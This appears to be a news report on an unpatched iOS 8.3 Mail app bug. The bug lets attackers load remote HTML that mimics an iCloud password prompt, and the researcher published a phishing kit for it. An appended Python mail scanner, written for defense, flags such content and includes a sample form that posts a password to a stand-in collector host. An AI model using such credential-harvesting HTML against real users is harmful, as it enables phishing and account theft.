Users of iOS, beware. An unfixed vulnerability has been found in the Mail app, which allows hackers to steal passwords by sending an email.

The flaw was first noticed by Ernst and Young forensic bod Jan Soucek. He has created a tool capable of generating slick iCloud password phishing emails, which he says exploit an unpatched bug.

He has even recorded a proof-of-concept video.

He made an iOS 8.3 Mail.app inject kit. It exploits a bug in the native email app and can produce a realistic pop-up. Soucek explained that he first told Apple about the bug in January, but that the company had not responded or fixed the problem.

Now he has opted for a more extreme approach. The complete kit is available on GitHub.

"Back in January 2015 I stumbled upon a bug in iOS' mail client, resulting in HTML tags in email messages not being ignored", Soucek said.

"This bug allows remote HTML content to be loaded, replacing the content of the original email message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password 'collector' using simple HTML and CSS", Soucek added.

"It was filed under Radar #19479280 back in January, but the fix was not delivered in any of the iOS updates following 8.1.2", Soucek explains.

Hackers can now use and customize the free tools to go after whichever iOS credentials they want. Unsuspecting Apple users would see only a security pop-up that looks no different from the regular iCloud identification process.
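Until a fix ships, a mail gateway can flag inbound messages whose HTML part loads remote content or asks for a password. The sketch below is an added example, not code from Soucek's kit or from Apple. The list of flagged tags, the function names and the sample messages are assumptions made for illustration, since the article does not name the tag involved.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser

# Tags chosen for this example; the article does not name the tag involved.
REMOTE_LOADERS = {"iframe", "frame", "object", "embed"}


class ActiveContentScanner(HTMLParser):
    """Records HTML constructs that load remote content or collect input."""

    def __init__(self):
        super().__init__()
        self.findings = set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip().lower() for k, v in attrs}
        if tag == "meta" and a.get("http-equiv") == "refresh":
            self.findings.add("meta-refresh")
        elif tag in REMOTE_LOADERS:
            self.findings.add("remote-embed")
        elif tag == "form":
            self.findings.add("form")
        elif tag == "input" and a.get("type") == "password":
            self.findings.add("password-input")


def scan_message(raw: bytes) -> set:
    """Return findings for every text/html part, after transfer decoding."""
    msg = message_from_bytes(raw, policy=policy.default)
    scanner = ActiveContentScanner()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            scanner.feed(part.get_content())  # decodes base64 / quoted-printable
    scanner.close()
    return scanner.findings


def build_sample(html: str) -> bytes:
    """Constructed sample: a base64-encoded, HTML-only message."""
    m = EmailMessage()
    m["From"], m["To"], m["Subject"] = "a@example.invalid", "b@example.invalid", "sample"
    m.set_content(html, subtype="html", cte="base64")
    return m.as_bytes()


BENIGN = build_sample("<p>Quarterly report attached. <b>Thanks</b></p>")
SUSPECT = build_sample('<form action="https://collector.example.invalid/">'
                       '<input type="password" name="p"></form>')

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, sorted(scan_message(raw)))
```

Because the HTML part is decoded before it is parsed, the check still fires when the body is base64-encoded, which a plain string search over the raw message would miss.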

Apple is yet to comment on the issue.

Published under license from ITProPortal.com, a Net Communities Ltd Publication. All rights reserved.

Photo Credit: D. Hammonds/Shutterstock